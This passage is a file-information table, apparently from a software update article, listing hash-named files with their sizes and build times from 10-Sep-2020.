applicable| 203,484| 10-Sep-2020| 08:09| Not applicable \nFil5fd4bc51ae2ad462403cdc6a0cf9ffd0| Not applicable| 311,764| 10-Sep-2020| 08:10| Not applicable \nFil604f37df9e3b6c4d7c48f14c35a26977| Not applicable| 126,177| 10-Sep-2020| 08:08| Not applicable \nFil610677a0034b8232f2b460d83c22ce46| Not applicable| 481,442| 10-Sep-2020| 08:09| Not applicable \nFil6133c70794989aad906ec1c690498770| Not applicable| 1,669| 10-Sep-2020| 08:10| Not applicable \nFil63179e1cb286b0ef11dc63dc6af82432| Not applicable| 14,116| 10-Sep-2020| 08:10| Not applicable \nFil6356fbacb88d6b1b13e09aadb6887fbe| Not applicable| 161,576| 10-Sep-2020| 08:10| Not applicable \nFil64dd0c27769e484c139e2503ec3eef51| Not applicable| 218,860| 10-Sep-2020| 08:10| Not applicable \nFil65080648928ede60012994a0baeca00b| Not applicable| 309,691| 10-Sep-2020| 08:09| Not applicable \nFil6ad129a5d744ab89f7b431d1d495262a| Not applicable| 60,605| 10-Sep-2020| 08:08| Not applicable \nFil6ae5c571deb81c557347776937eec424| Not applicable| 327,120| 10-Sep-2020| 08:08| Not applicable \nFil6c511826bfeecb77f6559c6b60d65511| Not applicable| 360,888| 10-Sep-2020| 08:09| Not applicable \nFil6c6539569c8b5a20bd7f4dc318576341| Not applicable| 305,628| 10-Sep-2020| 08:09| Not applicable \nFil6d0c3c83a060d3235e4a034bf754cdde| Not applicable| 139,720| 10-Sep-2020| 08:09| Not applicable \nFil6ec9b1a61bc1b1de3666c8f074b638b0| Not applicable| 102,157,937| 10-Sep-2020| 08:12| Not applicable \nFil6f8d2fab306d136e7656db49710c3a48| Not applicable| 3,636| 10-Sep-2020| 08:10| Not applicable \nFil6fe7b10d2287827cf3c81b58b9c8b8ff| Not applicable| 304,524| 10-Sep-2020| 08:10| Not applicable \nFil7189adae9ca485f37c0c74269ff71aca| Not applicable| 12,644| 10-Sep-2020| 08:10| Not applicable \nFil71e73a51dc2a21736116b8807bb466e8| Not applicable| 156,649| 10-Sep-2020| 08:09| Not applicable \nFil7207154834a23fbc29d011e71d208a39| Not applicable| 163,997| 10-Sep-2020| 08:10| Not applicable \nFil720fe9713dec6be87ee03bce38fbfc36| Not applicable| 321,069| 10-Sep-2020| 08:08| Not applicable \nFil7332c61fe6101e9bae82c487d99082df| Not applicable| 916| 10-Sep-2020| 08:10| Not applicable \nFil736e7b808675fe35044733ce258a9a73| Not applicable| 209,717| 10-Sep-2020| 08:09| Not applicable \nFil73c9286d8470aa113cba01507403eeba| Not applicable| 123,453| 10-Sep-2020| 08:10| Not applicable \nFil73dbdc432c5bb5f29330a83a9faa7ae1| Not applicable| 319,119| 10-Sep-2020| 08:10| Not applicable \nFil74f06c9b75edb14687c2262ad6ae2557| Not applicable| 310,368| 10-Sep-2020| 08:08| Not applicable \nFil7511efbde449570e1079881ef478d89f| Not applicable| 328,987| 10-Sep-2020| 08:10| Not applicable \nFil75c2cda8a128e765ff0af0755bfd328b| Not applicable| 145,359| 10-Sep-2020| 08:09| Not applicable \nFil7622d867b4e32c321108f9585ae213e0| Not applicable| 143,754| 10-Sep-2020| 08:10| Not applicable \nFil764919a245fe2bc500925814cddfbdad| Not applicable| 72,860| 10-Sep-2020| 08:03| Not applicable \nFil76a84f20ffd55d7ea12ac35d8380efd5| Not applicable| 425,083| 10-Sep-2020| 08:10| Not applicable \nFil7700cf10ad703df7c8918a0563a5e129| Not applicable| 170,409| 10-Sep-2020| 08:10| Not applicable \nFil780df069c247b8094634ab0404623781| Not applicable| 3,146| 10-Sep-2020| 08:10| Not applicable \nFil78360aa0f236f838f94a573fa0e591eb| Not applicable| 306,391| 10-Sep-2020| 08:10| Not applicable \nFil788ad7e3f4abc8bfb4327d0b98934699| Not applicable| 3,264| 10-Sep-2020| 08:10| Not applicable \nFil789b96ff5e7f5c36651793db27c8b262| Not applicable| 156,482| 10-Sep-2020| 08:10| Not applicable \nFil7975d5410f26d07f08de47940983d903| Not applicable| 11,720| 10-Sep-2020| 08:10| Not applicable \nFil798d3f63fe34287c86fffb74428a321a| Not applicable| 298,444| 10-Sep-2020| 08:11| Not applicable \nFil79b13a2c33d13735946561479fc859fa| Not applicable| 133,726| 10-Sep-2020| 08:11| Not applicable \nFil79c7a259268acf783baef95ca5b23ec1| Not applicable| 152,767| 10-Sep-2020| 08:07| Not applicable \nFil7a2063c960c5cb61395e7839f1297cb5| Not applicable| 4,115| 10-Sep-2020| 08:10| Not applicable \nFil7a403fcd3c2773230c350d8e1d3cebf7| Not applicable| 104,032| 10-Sep-2020| 08:03| Not applicable \nFil7a9f06943db3abcb09bf15ae13ff2cd2| Not applicable| 137,922| 10-Sep-2020| 08:08| Not applicable \nFil7b670339ef54eea40a7516c12d2f0e92| Not applicable| 486,258| 10-Sep-2020| 08:08| Not applicable \nFil7b9dcb919f1fd2e3a1f6f379fbfaeef0| Not applicable| 165,327| 10-Sep-2020| 08:09| Not applicable \nFil7bc288d1803d8c01d917d4ae3424dd04| Not applicable| 371,056| 10-Sep-2020| 08:10| Not applicable \nFil7be03a57aa609693fcd744981699f067| Not applicable| 214,670| 10-Sep-2020| 08:10| Not applicable \nFil7cd60b323924095924a33c83b8160967| Not applicable| 515,462| 10-Sep-2020| 08:08| Not applicable \nFil7cddc3f217fc9bd77c3335a3bbe74040| Not applicable| 316,645| 10-Sep-2020| 08:10| Not applicable \nFil7d3d44cb179d947736c393335bc1d8a5| Not applicable| 323,379| 10-Sep-2020| 08:08| Not applicable \nFil7e1364e8b092a71503bb6ab4c0c8d043| Not applicable| 317,812| 10-Sep-2020| 08:10| Not applicable \nFil7f88ed25a2323690ef4603fcd5965e29| Not applicable| 146,052| 10-Sep-2020| 08:08| Not applicable \nFil7fc67e0ea132a46fa0c81ae793c6fafb| Not applicable| 1,751| 10-Sep-2020| 08:10| Not applicable \nFil7ffa598af3dc4eba6484cfca34eff091| Not applicable| 487,790| 10-Sep-2020| 08:10| Not applicable \nFil7fffbc3b910469a09b1d0670696bd038| Not applicable| 298,276| 10-Sep-2020| 08:09| Not applicable \nFil802e831d6cd841b23e31f3ede7146efa| Not applicable| 160,374| 10-Sep-2020| 08:09| Not applicable \nFil8032f47eeca48977d2f693f7644627ce| Not applicable| 123,440| 10-Sep-2020| 08:08| Not applicable \nFil809e41480ae24ce8f65630fb91e72e3e| Not applicable| 191,320| 10-Sep-2020| 08:10| Not applicable \nFil819cef16705be45debd0be4d68755dbb| Not applicable| 22,679| 10-Sep-2020| 08:10| Not applicable \nFil819e4ee2c73b6dac7c9b217a2edccf64| Not applicable| 10,875| 10-Sep-2020| 08:10| Not applicable \nFil81c79182b21820eb762d4cc2ac59769f| Not applicable| 165,056| 10-Sep-2020| 08:08| Not applicable \nFil828666eab0d3bdc61f9fe757bd60e3a2| Not applicable| 375,074| 10-Sep-2020| 08:09| Not applicable \nFil832eb962b387b4e7631ffa4158cb28cc| Not applicable| 14,837| 10-Sep-2020| 08:10| Not applicable \nFil851524c7c4958c3155502d781c920d9b| Not applicable| 81,295| 10-Sep-2020| 08:10| Not applicable \nFil86eb489656c398a89c25641e80f48303| Not applicable| 121,319| 10-Sep-2020| 08:09| Not applicable \nFil86fd0667d62cefa2ae6e49f317434bd6| Not applicable| 384,644| 10-Sep-2020| 08:08| Not applicable \nFil88ec4eef108486342f6b6921bccaea93| Not applicable| 943,740| 10-Sep-2020| 08:12| Not applicable \nFil89331bf5c45adb0d8a8ea178cc079709| Not applicable| 300,269| 10-Sep-2020| 08:08| Not applicable \nFil8a10c1556c031a0905905396871c93f7| Not applicable| 310,330| 10-Sep-2020| 08:09| Not applicable \nFil8b153dea503da810e5e578642a5c28fe| Not applicable| 3,822| 10-Sep-2020| 08:10| Not applicable \nFil8c35bfdd38d7db1a373ae3b3a87a84b5| Not applicable| 164,030| 10-Sep-2020| 08:09| Not applicable \nFil8cbd0cddb9a1705309ebeabfe75fe38a| Not applicable| 319,024| 10-Sep-2020| 08:08| Not applicable \nFil8dc3b8e19a7e2e60f48bf22687139503| Not applicable| 3,314| 10-Sep-2020| 08:10| Not applicable \nFil8e9637e486491d4df1ea670c5b33eb16| Not applicable| 3,600| 10-Sep-2020| 08:10| Not applicable \nFil9007d7a068a4430d0ebefa4b039db1b4| Not applicable| 162,200| 10-Sep-2020| 08:10| Not applicable \nFil9032e5295c43ed35e2cd2820ebd6af91| Not applicable| 308,546| 10-Sep-2020| 08:08| Not applicable \nFil9050234bc32f4d53dcf496a54c13c1f0| Not applicable| 362,146| 10-Sep-2020| 08:09| Not applicable \nFil9052d1a7df067454a5205ba61f60202c| Not applicable| 414,847| 10-Sep-2020| 08:10| Not applicable \nFil907968cb2bdeead0a4c3dd51374b84f1| Not applicable| 160,076| 10-Sep-2020| 08:08| Not applicable \nFil90cb08f524bc6f2fd5d5c59c9e880a3b| Not applicable| 408,856| 10-Sep-2020| 08:10| Not applicable \nFil9141167468612be7f7ce04061b4ba430| Not applicable| 221,454| 10-Sep-2020| 08:10| Not applicable \nFil915152e03c7027618c1570479b195120| Not applicable| 115,620| 10-Sep-2020| 08:09| Not applicable \nFil9178f92f0a34fc57e83a4224c5cd4c6f| Not applicable| 123,425| 10-Sep-2020| 08:10| Not applicable \nFil91b888a87f12e84cd76b09d8a8239110| Not applicable| 317,225| 10-Sep-2020| 08:10| Not applicable \nFil922f0dc015ce910e694c684667216edf| Not applicable| 85,712| 10-Sep-2020| 08:10| Not applicable \nFil92839d18408beb0ccdd398fa8d63d256| Not applicable| 304,785| 10-Sep-2020| 08:08| Not applicable \nFil92b9f91110f3fc68adbba7781dca69f7| Not applicable| 955,169| 10-Sep-2020| 08:12| Not applicable \nFil936f4520f1f1a23512af78649723bd24| Not applicable| 1,787| 10-Sep-2020| 08:10| Not applicable \nFil95c4c617e843522bcbc5f0ea98be1499| Not applicable| 494,807| 10-Sep-2020| 08:10| Not applicable \nFil96195cf594115b0dbe9a6f0231ef1047| Not applicable| 313,299| 10-Sep-2020| 08:09| Not applicable \nFil963c3ba8ce3369f28a234d725b21bc1c| Not applicable| 4,281| 10-Sep-2020| 08:10| Not applicable \nFil9650173f54879818e5ec095eeb16ed0b| Not applicable| 396,015| 10-Sep-2020| 08:08| Not applicable \nFil966154a8118d7385953a6d219e5eb17c| Not applicable| 1,414| 10-Sep-2020| 08:10| Not applicable \nFil969cef7f118d3f325203fd0cb688b9ec| Not applicable| 2,110,683| 10-Sep-2020| 08:07| Not applicable \nFil96d73a0c451e93f8ea3773e8fe0fbbfc| Not applicable| 33,811| 10-Sep-2020| 08:11| Not applicable \nFil972290622741630c40e4aa0864c01aa4| Not applicable| 1,616| 10-Sep-2020| 08:10| Not applicable \nFil97937f8123552bc8e9d12b174086d31c| Not applicable| 469,857| 10-Sep-2020| 08:08| Not applicable \nFil97cbf02bb228d8da0527ece430405ab2| Not applicable| 301,969| 10-Sep-2020| 08:09| Not applicable \nFil986b652b14f678fe052fed9bba96162e| Not applicable| 163,883| 10-Sep-2020| 08:08| Not applicable \nFil98ef484ce7150b406e3016cd9924d142| Not applicable| 13,961| 10-Sep-2020| 08:10| Not applicable \nFil9956a513417bb5463e0ba651a166baf0| Not applicable| 514,510| 10-Sep-2020| 08:09| Not applicable \nFil9ad3820a6c3baa899d30b5c2befddb0f| Not applicable| 501,780| 10-Sep-2020| 08:09| Not applicable \nFil9bc19d53264a55a58e5f699c80356bb2| Not applicable| 1,818| 10-Sep-2020| 08:10| Not applicable \nFil9be11b2ba300199597d09229eada5f26| Not applicable| 14,295| 10-Sep-2020| 08:10| Not applicable \nFil9c53e682ec387e24b826b5f20d0d7744| Not applicable| 258,852| 10-Sep-2020| 08:09| Not applicable \nFil9cc47a8297b69ca8b92c5c5fbc5a72a9| Not applicable| 146,219| 10-Sep-2020| 08:09| Not applicable \nFil9d179c67312a815f3d90f05dd98d935f| Not applicable| 295,260| 10-Sep-2020| 08:08| Not applicable \nFil9d3115e00dd3480f86694eb0171e2ab7| Not applicable| 147,427| 10-Sep-2020| 08:08| Not applicable \nFil9de60681dee78970a404d53a64af2f30| Not applicable| 16,604| 10-Sep-2020| 08:10| Not applicable \nFil9e9c8fdc13f8e3438936117f467c32f2| Not applicable| 3,647| 10-Sep-2020| 08:10| Not applicable \nFil9ea96f90dc98136d2990b368e30cba7f| Not applicable| 314,432| 10-Sep-2020| 08:08| Not applicable \nFil9ef7a49aadd91bd2e7723a793c4ececa| Not applicable| 196,624| 10-Sep-2020| 08:07| Not applicable \nFil9f4a9c9c0df85e4de8cef75ad843a4bf| Not applicable| 853| 10-Sep-2020| 08:10| Not applicable \nFil9fa4d749b570205397f22bb7798f1ad8| Not applicable| 191,467| 10-Sep-2020| 08:07| Not applicable \nFil9fb5c95485bb8d9d33d5f93c5aaf64b2| Not applicable| 16,227| 10-Sep-2020| 08:10| Not applicable \nFil9fecbd76d57255e27cc95507f3aaab07| Not applicable| 329,540| 10-Sep-2020| 08:10| Not applicable \nFila2743c24f7094b33d0d4449897c866a6| Not applicable| 119,408| 10-Sep-2020| 08:08| Not applicable \nFila2f6a440343bc9ff6660fce140eadd2d| Not applicable| 448,596| 10-Sep-2020| 08:08| Not applicable \nFila505629643c3e008b8bd0e23a5c4e25d| Not applicable| 413,212| 10-Sep-2020| 08:09| Not applicable \nFila50b2e8bd5431612810b0fcf988a1828| Not applicable| 209,253| 10-Sep-2020| 08:11| Not applicable \nFila5363cc509db7b571c6c4c3cd9062471| Not applicable| 208,443| 10-Sep-2020| 08:10| Not applicable \nFila57f8bbbe3218e6ecf4f4d70668de2dc| Not applicable| 314,531| 10-Sep-2020| 08:08| Not applicable \nFila62c0ced269195777d4d83700b448c00| Not applicable| 380,561| 10-Sep-2020| 08:08| Not applicable \nFila702279a2573d1ed8f2fcdee9713c0dd| Not applicable| 209,728| 10-Sep-2020| 08:09| Not applicable \nFila8ced4b496da09516e99919d4eaf64f6| Not applicable| 159,063| 10-Sep-2020| 08:08| Not applicable \nFila8f5e5a43d97dfb60f41dfc1b8459851| Not applicable| 508,891| 10-Sep-2020| 08:08| Not applicable \nFila913026b0e770b0a0f627ace5a752454| Not applicable| 322,902| 10-Sep-2020| 08:09| Not applicable \nFilaac5e88adcaaf27436c416aa7a0165bd| Not applicable| 249,029| 10-Sep-2020| 08:09| Not applicable \nFilab134bb61b2e10157e892c40df3c7e86| Not applicable| 159,193| 10-Sep-2020| 08:09| Not applicable \nFilab5e2407151586fb17aa6a5e23983146| Not applicable| 380,417| 10-Sep-2020| 08:07| Not applicable \nFilab7106fec6a571b081793e6fd0772840| Not applicable| 324,317| 10-Sep-2020| 08:10| Not applicable \nFilab84c7b0ea2c18151bdec3362357de28| Not applicable| 382,607| 10-Sep-2020| 08:10| Not applicable \nFilacb3fe0c456bdeb57f38467806292a12| Not applicable| 169,689| 10-Sep-2020| 08:08| Not applicable \nFilad3a7da52bfdbcdc556e7afee04e466d| Not applicable| 370,571| 10-Sep-2020| 08:09| Not applicable \nFilae12f186604e1e9a1564f0bd8d3f02d3| Not applicable| 422,675| 10-Sep-2020| 08:11| Not applicable \nFilaef6c0ddd04caa6d726d5335dd817311| Not applicable| 202,927| 10-Sep-2020| 08:10| Not applicable \nFilafc694642ba5b6098760517160b0e8bf| Not applicable| 157,170| 10-Sep-2020| 08:08| Not applicable \nFilafe4ec5e5c84f4cbbd605478cefc5629| Not applicable| 3,090| 10-Sep-2020| 08:10| Not applicable \nFilb0d5f04a53228a377d15814c78465b27| Not applicable| 669| 10-Sep-2020| 08:10| Not applicable \nFilb20b3cc21a25081a4bca14731ed24d46| Not applicable| 4,473| 10-Sep-2020| 08:10| Not applicable \nFilb2511eb8cb15578d5607802d13cb5c4f| Not applicable| 160,204| 10-Sep-2020| 08:11| Not applicable \nFilb2d8808ed734ba4cdde6c0bb616a5918| Not applicable| 234,774| 10-Sep-2020| 08:09| Not applicable \nFilb38126b47351a15bc93f1845dc8aba35| Not applicable| 326,044| 10-Sep-2020| 08:09| Not applicable \nFilb3ecb6b553aa136a95f785fae49b7290| Not applicable| 318,445| 10-Sep-2020| 08:09| Not applicable \nFilb4e11fab484f7e28061acd0a0b998b2b| Not applicable| 297,352| 10-Sep-2020| 08:09| Not applicable \nFilb52f287490a4bf46c9cead71b6c6d32f| Not applicable| 377,427| 10-Sep-2020| 08:10| Not applicable \nFilb6922820d7c8951d2c0a274c0247a024| Not applicable| 929| 10-Sep-2020| 08:10| Not applicable \nFilb7953f6142a677d96f918f4748d335e8| Not applicable| 142,609| 10-Sep-2020| 08:10| Not applicable \nFilb7980f151e3ac5df2176c1c9232a3a97| Not applicable| 422,398| 10-Sep-2020| 08:10| Not applicable \nFilb7ebe5ea802d62f201cecf33058afa68| Not applicable| 158,931| 10-Sep-2020| 08:10| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 218,643| 10-Sep-2020| 08:12| Not applicable \nFilbaada6b445e5d018d30bae5f55810cbb| Not applicable| 11,531| 10-Sep-2020| 08:10| Not applicable \nFilbac509fa0e072d1cea52129ba1408636| Not applicable| 5,470| 10-Sep-2020| 08:10| Not applicable \nFilbae1886423fa60040987b70277c99a66| Not applicable| 212,585| 10-Sep-2020| 08:10| Not applicable \nFilbaee23394142e54df188a3681e7b00e0| Not applicable| 588,271| 10-Sep-2020| 08:09| Not applicable \nFilbb4be32d89ad2d104df2959499c2c5dd| Not applicable| 424,381| 10-Sep-2020| 08:10| Not applicable \nFilbc0374f21dbcf9dcd43948267292d827| Not applicable| 151,684| 10-Sep-2020| 08:09| Not applicable \nFilbce863d9e87e78f7b216f9063068fd70| Not applicable| 13,803| 10-Sep-2020| 08:10| Not applicable \nFilbe0b71d79825d6251a88a486de2a0fae| Not applicable| 175,794| 10-Sep-2020| 08:08| Not applicable \nFilbe5c25571628b164d9b0abeae72c357a| Not applicable| 14,488| 10-Sep-2020| 08:03| Not applicable \nFilbe8804efe450de6f32592158385173af| Not applicable| 162,776| 10-Sep-2020| 08:09| Not applicable \nFilbec2fefb4339db1cb2a2a81c626af5b8| Not applicable| 148,912| 10-Sep-2020| 08:10| Not applicable \nFilbf439d900d8e8c938a91453ceef33748| Not applicable| 385,061| 10-Sep-2020| 08:10| Not applicable \nFilbfe5e54bbcd75097a2290bb9ffbf9129| Not applicable| 158,084| 10-Sep-2020| 08:09| Not applicable \nFilbfebb0e9f43c859d9b0a3079fb790dca| Not applicable| 140,997| 10-Sep-2020| 08:08| Not applicable \nFilc0360124072910524d4b1e78f11ea314| Not applicable| 149,305| 10-Sep-2020| 08:10| Not applicable \nFilc070c10edde57f91e2b923f53638b156| Not applicable| 122,287| 10-Sep-2020| 08:09| Not applicable \nFilc0a74236d5938545f3dd0d2e81fe5145| Not applicable| 609,713| 10-Sep-2020| 08:09| Not applicable \nFilc1246ec6443f5fdece97bee947f338b8| Not applicable| 163,350| 10-Sep-2020| 08:08| Not applicable \nFilc166412dec3b545aa718384ccdc0c3d1| Not applicable| 22,512| 10-Sep-2020| 08:10| Not applicable \nFilc244723fb935bd0d0901b33c0fa3fef4| Not applicable| 309,279| 10-Sep-2020| 08:09| Not applicable \nFilc2f5ff7a8957ea0ec0b802705b42e323| Not applicable| 166,161| 10-Sep-2020| 08:08| Not applicable \nFilc320fdef8521e5bb17a5c121a74e650e| Not applicable| 305,137| 10-Sep-2020| 08:11| Not applicable \nFilc3e271840e8b5de0e4ed893a9b69de17| Not applicable| 82,108| 10-Sep-2020| 08:10| Not applicable \nFilc3f3571f7d40d7ad31bcbde165570280| Not applicable| 7,684| 10-Sep-2020| 08:10| Not applicable \nFilc42459f85335dc5b0e754ebf75734c79| Not applicable| 118,946| 10-Sep-2020| 08:10| Not applicable \nFilc4ab4e05a6193193ef464c60fae6cbd7| Not applicable| 120,705| 10-Sep-2020| 08:09| Not applicable \nFilc5ae06f5615759f92b67380884df008e| Not applicable| 117,623| 10-Sep-2020| 08:10| Not applicable \nFilc5c55afa5d74d23f6b65f3216e37d317| Not applicable| 1,526| 10-Sep-2020| 08:10| Not applicable \nFilc786628612d2b1a245c8c71b29c30be3| Not applicable| 398,338| 10-Sep-2020| 08:09| Not applicable \nFilc830aa3bd6a85d79ebf456c5e64b8035| Not applicable| 379,187| 10-Sep-2020| 08:09| Not applicable \nFilc8e516689a540bc63bb961f4097b7e57| Not applicable| 160,137| 10-Sep-2020| 08:10| Not applicable \nFilc8e6da9f10502e8ad2295645fd80d4e5| Not applicable| 121,496| 10-Sep-2020| 08:08| Not applicable \nFilc96a599a80f3de2e07c515d63158e572| Not applicable| 330,578| 10-Sep-2020| 08:10| Not applicable \nFilc9c9f098bfe576e332d5448e341d7275| Not applicable| 153,366| 10-Sep-2020| 08:08| Not applicable \nFilca014992a789c86d642b1454a84b0471| Not applicable| 375,852| 10-Sep-2020| 08:08| Not applicable \nFilca135d6cdf9927dde76343b8e7366baf| Not applicable| 162,198| 10-Sep-2020| 08:10| Not applicable \nFilca3d26a73693291377b5eed5ddcaa0f1| Not applicable| 161,841| 10-Sep-2020| 08:10| Not applicable \nFilcac638de4b1f902ff58a662d4dac3d29| Not applicable| 56,854| 10-Sep-2020| 08:07| Not applicable \nFilcb5fa00024c3bc85ae7c993808e1b884| Not applicable| 120,208| 10-Sep-2020| 08:09| Not applicable \nFilcc0fdd022d9f5d8bc8ec46b80403d2e2| Not applicable| 1,589| 10-Sep-2020| 08:10| Not applicable \nFilcc30666b183d540fe06d8954d0f2413b| Not applicable| 3,297| 10-Sep-2020| 08:10| Not applicable \nFilcc721cc9dd7ee55eb0e0698f712731d7| Not applicable| 2,003,228| 10-Sep-2020| 08:07| Not applicable \nFilccbc2448b8815f8b825a84cc78bb511c| Not applicable| 11,405| 10-Sep-2020| 08:10| Not applicable \nFilcd270becc68f50bf28755be77714be9e| Not applicable| 394,132| 10-Sep-2020| 08:10| Not applicable \nFilcd886455496c5ec1862cf4aa506be262| Not applicable| 117,895| 10-Sep-2020| 08:08| Not applicable \nFilcddc4ce9e9c46991c0b22e91ba3704ba| Not applicable| 160,587| 10-Sep-2020| 08:10| Not applicable \nFilcff1dd14fb439fc7e9daa9dcb3e116c5| Not applicable| 12,932| 10-Sep-2020| 08:10| Not applicable \nFild034d7905a9a668488c8afd111f03890| Not applicable| 317,800| 10-Sep-2020| 08:11| Not applicable \nFild134087dcd6c80d2440a6f01ca531d43| Not applicable| 274,174| 10-Sep-2020| 08:09| Not applicable \nFild14c12465bfbd20e37f23e7a26295b48| Not applicable| 365,935| 10-Sep-2020| 08:07| Not applicable \nFild1b8d036a9c84b39ee432dce4f6d746f| Not applicable| 139,345| 10-Sep-2020| 08:09| Not applicable \nFild22b63170e5bf9a8ba95b20e77f6931a| Not applicable| 121,042| 10-Sep-2020| 08:10| Not applicable \nFild303b30a374c6671b361236e01f4b5cf| Not applicable| 164,590| 10-Sep-2020| 08:10| Not applicable \nFild4549c48b4b688ecc880a1f283799d3f| Not applicable| 498,379| 10-Sep-2020| 08:09| Not applicable \nFild4b4f55d65650fb68d8ae661f35a6cf3| Not applicable| 310,507| 10-Sep-2020| 08:09| Not applicable \nFild4cd251093d729f1a42047080c2778eb| Not applicable| 306,546| 10-Sep-2020| 08:08| Not applicable \nFild51a17d6f91520b346fc51bc3328726b| Not applicable| 145,877| 10-Sep-2020| 08:11| Not applicable \nFild59daa81d7473621e57441d6ea0f15c0| Not applicable| 194,497| 10-Sep-2020| 08:10| Not applicable \nFild5bfe2feae3b6b40e6b16de030127c67| Not applicable| 155,310| 10-Sep-2020| 08:10| Not applicable \nFild5d8126bec59238a69351a093c4464d0| Not applicable| 3,790| 10-Sep-2020| 08:10| Not applicable \nFild5f03da3e3a095d1f2b4a304a98bf729| Not applicable| 157,712| 10-Sep-2020| 08:10| Not applicable \nFild68d4f36aac52c3202cf238e1f1e2964| Not applicable| 145,618| 10-Sep-2020| 08:09| Not applicable \nFild7148cc0a8a831b0690ba7edff9c89fd| Not applicable| 309,585| 10-Sep-2020| 08:09| Not applicable \nFild83a4ac68665cb7498564f6a2fa90824| Not applicable| 192,430| 10-Sep-2020| 08:08| Not applicable \nFild84b6ccde6dad97a33cce010b6cf5541| Not applicable| 340,402| 10-Sep-2020| 08:08| Not applicable \nFild87dcf579f0d9dcbe4e7662caabee77e| Not applicable| 1,363| 10-Sep-2020| 08:10| Not applicable \nFild8a7c51dd3b9661c0d3937db06a0f6cc| Not applicable| 155,414| 10-Sep-2020| 08:11| Not applicable \nFild9013e15b94e09b08396c315e0631a52| Not applicable| 316,058| 10-Sep-2020| 08:10| Not applicable \nFild95c9ba0d427e30ab018118c4f8473b3| Not applicable| 389,600| 10-Sep-2020| 08:08| Not applicable \nFilda6a4ae71e1b6b7ccfcb6a63a2127d4d| Not applicable| 1,749| 10-Sep-2020| 08:10| Not applicable \nFildaad8f46b98411d7cb5457607ddc0097| Not applicable| 5,141| 10-Sep-2020| 08:10| Not applicable \nFildade2b2752b156e32704242e66737bf6| Not applicable| 3,404| 10-Sep-2020| 08:10| Not applicable \nFildaf7959b7c75db4261e040beb7293a13| Not applicable| 5,396| 10-Sep-2020| 08:10| Not applicable \nFildb3335f7da7296c0cebb1f9dcf0a13b6| Not applicable| 166,555| 10-Sep-2020| 08:10| Not applicable \nFildb508355a4e407081cba2130e65d580e| Not applicable| 327,332| 10-Sep-2020| 08:08| Not applicable \nFildb5fd75c40a38a12961a5701f3dd077c| Not applicable| 11,205| 10-Sep-2020| 08:08| Not applicable \nFildc8c47decc0a980dde3b8835cbb1da3b| Not applicable| 143,173| 10-Sep-2020| 08:09| Not applicable \nFildcfc7c65952f1370410a552a0c3bdacb| Not applicable| 143,634| 10-Sep-2020| 08:07| Not applicable \nFildd3233d5a669fbdbc6e1395b93273f67| Not applicable| 147,257| 10-Sep-2020| 08:08| Not applicable \nFildd420a21b6ff581e2f8cba46cf9cfc00| Not applicable| 13,697| 10-Sep-2020| 08:10| Not applicable \nFildd57d9330db1e4c1c5076183b76a0429| Not applicable| 159,581| 10-Sep-2020| 08:10| Not applicable \nFilde7edfbc94e0445055094a8412075849| Not applicable| 317,167| 10-Sep-2020| 08:08| Not applicable \nFildeb1eb5e06fd4f9ea01b736f7c5d3489| Not applicable| 4,463| 10-Sep-2020| 08:10| Not applicable \nFildeef0cc1dbfd12d4e4898acabeb8cc0a| Not applicable| 161,351| 10-Sep-2020| 08:10| Not applicable \nFildf1f940d4440482646f7e07b21c8977c| Not applicable| 400,048| 10-Sep-2020| 08:10| Not applicable \nFildf479c394a62a395362bac2175f263d9| Not applicable| 154,989| 10-Sep-2020| 08:08| Not applicable \nFile04ef21eb384d6ce69ac422ca5d202c8| Not applicable| 148,550| 10-Sep-2020| 08:08| Not applicable \nFile09f49833cf1f2443418e2be8f1e0004| Not applicable| 3,998| 10-Sep-2020| 08:10| Not applicable \nFile1425ffca08865888d2e0a662b85f22f| Not applicable| 194,027| 10-Sep-2020| 08:11| Not applicable \nFile2554c88cacc807d5b821e2d2e7977e7| Not applicable| 14,799| 10-Sep-2020| 08:10| Not applicable \nFile2a091148b8ca423a6f1f046e0adf881| Not applicable| 4,257| 10-Sep-2020| 08:10| Not applicable \nFile3b0bd2216637faabef0676a9e81a5a6| Not applicable| 215,571| 10-Sep-2020| 08:11| Not applicable \nFile3f54d4045f48da2f6084516bace3e1e| Not applicable| 163,145| 10-Sep-2020| 08:09| Not applicable \nFile45d1d7c137c59f6c1ffaab0ebc51f77| Not applicable| 292,978| 10-Sep-2020| 08:09| Not applicable \nFile54255e6002ed95d61afd7c75a5fa948| Not applicable| 370,103| 10-Sep-2020| 08:11| Not applicable \nFile5789132b8eb5f2f7efa7697590cf45c| Not applicable| 156,176| 10-Sep-2020| 08:09| Not applicable \nFile5dacfcc6f5dfff94990a84e026c4de2| Not applicable| 17,437| 10-Sep-2020| 08:10| Not applicable \nFile70589c97d754e78d2fe2fed99eaebcc| Not applicable| 314,666| 10-Sep-2020| 08:09| Not applicable \nFile71648118f1d0c1951edbcaa777d3a56| Not applicable| 251,235| 10-Sep-2020| 08:09| Not applicable \nFile783cced0fcba1ff313575bb1ca1c68c| Not applicable| 364,541| 10-Sep-2020| 08:08| Not applicable \nFile7c5afad77df85fd91512963f2fbf6e6| Not applicable| 34,450| 10-Sep-2020| 08:09| Not applicable \nFile88a06b53e20b9e6752aa61d8e189c10| Not applicable| 155,990| 10-Sep-2020| 08:09| Not applicable \nFile8b19ea66e7ffe68e3352d0de6ef2729| Not applicable| 407,248| 10-Sep-2020| 08:10| Not applicable \nFile93062b648276336059fa449db4153a3| Not applicable| 12,123| 10-Sep-2020| 08:10| Not applicable \nFilea581cb50d1d2cd077771d63c5b6dc51| Not applicable| 21,265| 10-Sep-2020| 08:10| Not applicable \nFileae73d48fc92a17e014b0abe1700f303| Not applicable| 156,338| 10-Sep-2020| 08:09| Not applicable \nFilec4338229af7da65b4b819322b30edda| Not applicable| 3,944| 10-Sep-2020| 08:10| Not applicable \nFilec7f6fc187f8be14de5ec034c2d85229| Not applicable| 118,511| 10-Sep-2020| 08:11| Not applicable \nFilecdb8669c113ce265be59f27aebb63c7| Not applicable| 201,438| 10-Sep-2020| 08:08| Not applicable \nFileeb9f8d46d03aa02e3a639c1190925ca| Not applicable| 4,194| 10-Sep-2020| 08:10| Not applicable \nFilefd2c6f724098d78412ccee1a36009ec| Not applicable| 367,647| 10-Sep-2020| 08:10| Not applicable \nFilf0c07502f8d3141d66a6c1fd4a71ca59| Not applicable| 4,352| 10-Sep-2020| 08:10| Not applicable \nFilf1324936e054d2474bba214d9e6855a0| Not applicable| 390,378| 10-Sep-2020| 08:08| Not applicable \nFilf1b4b77518eb47dc1959750fec59dcdc| Not applicable| 558,426| 10-Sep-2020| 08:08| Not applicable 